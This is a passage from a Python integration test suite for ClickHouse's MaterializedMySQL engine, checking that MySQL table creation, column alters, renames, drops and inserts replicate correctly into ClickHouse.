"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
mysql_node.query("CREATE VIEW test_database.test_table_1_view AS SELECT SUM(tiny_int) FROM test_database.test_table_1 GROUP BY _date;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_database_with_datetime_and_decimal(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dt")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dt")
mysql_node.query("CREATE DATABASE test_database_dt DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_dt.test_table_1 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
clickhouse_node.query("CREATE DATABASE test_database_dt ENGINE = MaterializedMySQL('{}:3306', 'test_database_dt', 'root', 'clickhouse')".format(service_name))
assert "test_database_dt" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_1 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
mysql_node.query("CREATE TABLE test_database_dt.test_table_2 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_2 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
clickhouse_node.query("DROP DATABASE test_database_dt")
mysql_node.query("DROP DATABASE test_database_dt")
def drop_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_drop")
mysql_node.query("CREATE DATABASE test_database_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("CREATE TABLE test_database_drop.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
mysql_node.query("INSERT INTO test_database_drop.test_table_2 VALUES(1), (2), (3), (4), (5), (6)")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_drop")
mysql_node.query("DROP DATABASE test_database_drop")
def create_table_like_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("DROP DATABASE IF EXISTS create_like2")
clickhouse_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("CREATE DATABASE create_like")
mysql_node.query("CREATE DATABASE create_like2")
mysql_node.query("CREATE TABLE create_like.t1 (id INT NOT NULL PRIMARY KEY)")
mysql_node.query("CREATE TABLE create_like2.t1 LIKE create_like.t1")
clickhouse_node.query(
f"CREATE DATABASE create_like ENGINE = MaterializeMySQL('{service_name}:3306', 'create_like', 'root', 'clickhouse')")
mysql_node.query("CREATE TABLE create_like.t2 LIKE create_like.t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\n")
mysql_node.query("USE create_like")
mysql_node.query("CREATE TABLE t3 LIKE create_like2.t1")
mysql_node.query("CREATE TABLE t4 LIKE t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\nt4\n")
check_query(clickhouse_node, "SHOW DATABASES LIKE 'create_like%'", "create_like\n")
clickhouse_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like2")
def create_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_create")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_create")
mysql_node.query("CREATE DATABASE test_database_create DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_create.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("INSERT INTO test_database_create.test_table_1 VALUES(1), (2), (3), (5), (6), (7);")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_create ENGINE = MaterializedMySQL('{}:3306', 'test_database_create', 'root', 'clickhouse')".format(
service_name))
# Check for pre-existing status
assert "test_database_create" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_1 ORDER BY id FORMAT TSV",
"1\n2\n3\n5\n6\n7\n")
mysql_node.query("CREATE TABLE test_database_create.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_create.test_table_2 VALUES(1), (2), (3), (4), (5), (6);")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
clickhouse_node.query("DROP DATABASE test_database_create")
mysql_node.query("DROP DATABASE test_database_create")
def rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename")
mysql_node.query("CREATE DATABASE test_database_rename DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_rename.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("RENAME TABLE test_database_rename.test_table_1 TO test_database_rename.test_table_2")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_2\n")
mysql_node.query("RENAME TABLE test_database_rename.test_table_2 TO test_database_rename.test_table_1")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database_rename")
mysql_node.query("DROP DATABASE test_database_rename")
def alter_add_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_add")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_add")
mysql_node.query("CREATE DATABASE test_database_add DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_add.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_1 INT NOT NULL")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_add ENGINE = MaterializedMySQL('{}:3306', 'test_database_add', 'root', 'clickhouse')".format(
service_name))
assert "test_database_add" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_add.test_table_1 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("CREATE TABLE test_database_add.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_add FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_1 INT NOT NULL, ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1, ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
default_expression = "DEFAULT\t0" if service_name == "mysql57" else "DEFAULT\tid"
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t" + default_expression + "\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_add.test_table_2 VALUES(1, 2, 3, 4, 5), (6, 7, 8, 9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_add.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\t3\t4\t5\n6\t7\t8\t9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_add")
mysql_node.query("DROP DATABASE test_database_add")
def alter_drop_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
mysql_node.query("CREATE DATABASE test_database_alter_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_1 DROP COLUMN drop_column")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_2 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_2 DROP COLUMN drop_column")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_drop.test_table_2 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_drop.test_table_2 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_alter_drop")
mysql_node.query("DROP DATABASE test_database_alter_drop")
def alter_rename_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
mysql_node.query("CREATE DATABASE test_database_alter_rename DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_1 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_1 RENAME COLUMN rename_column TO new_column_name")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_2 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nrename_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_2 RENAME COLUMN rename_column TO new_column_name")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_rename.test_table_2 VALUES(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_rename.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\n3\t4\n5\t6\n7\t8\n9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_alter_rename")
mysql_node.query("DROP DATABASE test_database_alter_rename")
def alter_modify_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
mysql_node.query("CREATE DATABASE test_database_alter_modify DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_1 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_1 MODIFY COLUMN modify_column INT")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_modify ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_modify', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_modify" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_2 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT FIRST")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"modify_column\tNullable(Int32)\t\t\t\t\t\nid\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT AFTER id")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_modify.test_table_2 VALUES(1, 2), (3, NULL)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_modify.test_table_2 ORDER BY id FORMAT TSV", "1\t2\n3\t\\N\n")
clickhouse_node.query("DROP DATABASE test_database_alter_modify")
mysql_node.query("DROP DATABASE test_database_alter_modify")
# TODO: need ClickHouse support ALTER TABLE table_name ADD COLUMN column_name, RENAME COLUMN column_name TO new_column_name;
# def test_mysql_alter_change_column_for_materialized_mysql_database(started_cluster):
# pass
def alter_rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
mysql_node.query("CREATE DATABASE test_database_rename_table DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_3")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename_table ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename_table', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename_table" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_3 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_1\ntest_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_4")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\ntest_table_4\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_4 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_rename_table.test_table_4 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_rename_table.test_table_4 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_rename_table")
mysql_node.query("DROP DATABASE test_database_rename_table")
def query_event_with_empty_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_event")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_event")
mysql_node.query("CREATE DATABASE test_database_event")
mysql_node.query("RESET MASTER")
mysql_node.query("CREATE TABLE test_database_event.t1(a INT NOT NULL PRIMARY KEY, b VARCHAR(255) DEFAULT 'BEGIN')")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(1)")
clickhouse_node.query(
"CREATE DATABASE test_database_event ENGINE = MaterializedMySQL('{}:3306', 'test_database_event', 'root', 'clickhouse')".format(
service_name))
# Reject one empty GTID QUERY event with 'BEGIN' and 'COMMIT'
mysql_cursor = mysql_node.alloc_connection().cursor(pymysql.cursors.DictCursor)
mysql_cursor.execute("SHOW MASTER STATUS")
(uuid, seqs) = mysql_cursor.fetchall()[0]["Executed_Gtid_Set"].split(":")
(seq_begin, seq_end) = seqs.split("-")
next_gtid = uuid + ":" + str(int(seq_end) + 1)
mysql_node.query("SET gtid_next='" + next_gtid + "'")
mysql_node.query("BEGIN")
mysql_node.query("COMMIT")
mysql_node.query("SET gtid_next='AUTOMATIC'")
# Reject one 'BEGIN' QUERY event and 'COMMIT' XID event.
mysql_node.query("/* start */ begin /* end */")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(2)")
mysql_node.query("/* start */ commit /* end */")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_event FORMAT TSV", "t1\n")
check_query(clickhouse_node, "SELECT * FROM test_database_event.t1 ORDER BY a FORMAT TSV", "1\tBEGIN\n2\tBEGIN\n")
clickhouse_node.query("DROP DATABASE test_database_event")
mysql_node.query("DROP DATABASE test_database_event")
def select_without_columns(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS db")
clickhouse_node.query("DROP DATABASE IF EXISTS db")
mysql_node.query("CREATE DATABASE db")
mysql_node.query("CREATE TABLE db.t (a INT PRIMARY KEY, b INT)")
clickhouse_node.query(
"CREATE DATABASE db ENGINE = MaterializedMySQL('{}:3306', 'db', 'root', 'clickhouse') SETTINGS max_flush_data_time = 100000".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM db FORMAT TSV", "t\n")
clickhouse_node.query("SYSTEM STOP MERGES db.t")
clickhouse_node.query("CREATE VIEW v AS SELECT * FROM db.t")
mysql_node.query("INSERT INTO db.t VALUES (1, 1), (2, 2)")
mysql_node.query("DELETE FROM db.t WHERE a = 2;")
# We need to execute a DDL for flush data buffer
mysql_node.query("CREATE TABLE db.temporary(a INT PRIMARY KEY, b INT)")
optimize_on_insert = clickhouse_node.query("SELECT value FROM system.settings WHERE name='optimize_on_insert'").strip()
if optimize_on_insert == "0":
res = ["3\n", "2\n", "2\n"]
else:
res = ["2\n", "2\n", "1\n"]
check_query(clickhouse_node, "SELECT count((_sign, _version)) FROM db.t FORMAT TSV", res[0])
assert clickhouse_node.query("SELECT count(_sign) FROM db.t FORMAT TSV") == res[1]
assert_eq_with_retry(clickhouse_node, "SELECT count(_version) FROM db.t", res[2].strip(), sleep_time=2, retry_count=3)
assert clickhouse_node.query("SELECT count() FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count(*) FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM (SELECT * FROM db.t) FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM v FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM merge('db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM remote('localhost', 'db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT _part FROM db.t FORMAT TSV") == "0_1_1_0\n"
assert clickhouse_node.query("SELECT _part FROM remote('localhost', 'db', 't') FORMAT TSV") == "0_1_1_0\n"
clickhouse_node.query("DROP VIEW v")
clickhouse_node.query("DROP DATABASE db")
mysql_node.query("DROP DATABASE db")
def insert_with_modify_binlog_checksum(clickhouse_node, mysql_node, service_name):
mysql_node.query("CREATE DATABASE test_checksum")
mysql_node.query("CREATE TABLE test_checksum.t (a INT PRIMARY KEY, b varchar(200))")
clickhouse_node.query("CREATE DATABASE test_checksum ENGINE = MaterializedMySQL('{}:3306', 'test_checksum', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_checksum FORMAT TSV", "t\n")
mysql_node.query("INSERT INTO test_checksum.t VALUES(1, '1111')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n")
mysql_node.query("SET GLOBAL binlog_checksum=NONE")
mysql_node.query("INSERT INTO test_checksum.t VALUES(2, '2222')")
